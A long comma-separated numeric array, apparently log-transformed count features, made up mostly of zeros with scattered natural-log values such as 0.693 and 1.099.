0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 6.182084906716631, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0,\n 0, 0, 0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 4.969813299576001, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 